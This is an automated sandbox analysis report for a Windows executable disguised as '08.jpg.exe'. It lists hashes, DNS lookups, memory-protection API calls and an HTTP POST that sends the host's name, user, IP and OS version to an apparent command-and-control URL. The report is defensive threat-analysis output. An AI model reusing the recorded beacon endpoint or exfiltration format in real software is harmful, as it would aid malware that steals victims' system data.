Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 9, 2021, 6:10 p.m.	July 9, 2021, 6:12 p.m.

Size	745.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`ed1921467f6784af6bdca40a06a541b5`
SHA256	`3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6`
CRC32	`0107E600`
ssdeep	`12288:4AbvaOTfFGikmS6jd2QML8HXWp8KEwbHBkm9jjgbFHLViv0dC2x0uTadTaUk7u:vbvJfFGikmS0pXfw7Bkm9j088PlTaDj`
PDB Path	c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check PE_Header_Zero - PE File Signature

Name	Response	Post-Analysis Lookup
sudepallon.com	A 77.222.42.67	77.222.42.67
api.ipify.org	CNAME nagano-19599.herokussl.com A 50.16.218.217 A 50.19.92.227 A 50.16.216.118 A 50.16.246.238 A 23.21.224.49 A 54.235.88.121 A 54.225.78.40 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com A 23.21.173.155	50.16.218.217

No Suricata Alerts

No Suricata TLS

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA July 9, 2021, 6:10 p.m.	computer_name: TEST22-PC	1	1	0

pdb_path

c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb

suspicious_features

POST method with no referer header

suspicious_request

POST http://sudepallon.com/8/forum.php

request	GET http://api.ipify.org/
request	POST http://sudepallon.com/8/forum.php

request

POST http://sudepallon.com/8/forum.php

Time & API	Arguments	Status
NtProtectVirtualMemory July 9, 2021, 6:10 p.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01071000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2021, 6:10 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2021, 6:10 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2021, 6:10 p.m.	process_identifier: 1016 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

domain

api.ipify.org

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 9, 2021, 6:10 p.m.	flags: 0 family: 2	1	0	0

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestA July 9, 2021, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: GUID=8962251904648732308&BUILD=0707in2_wvcr&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)	1	1	0

08.jpg.exe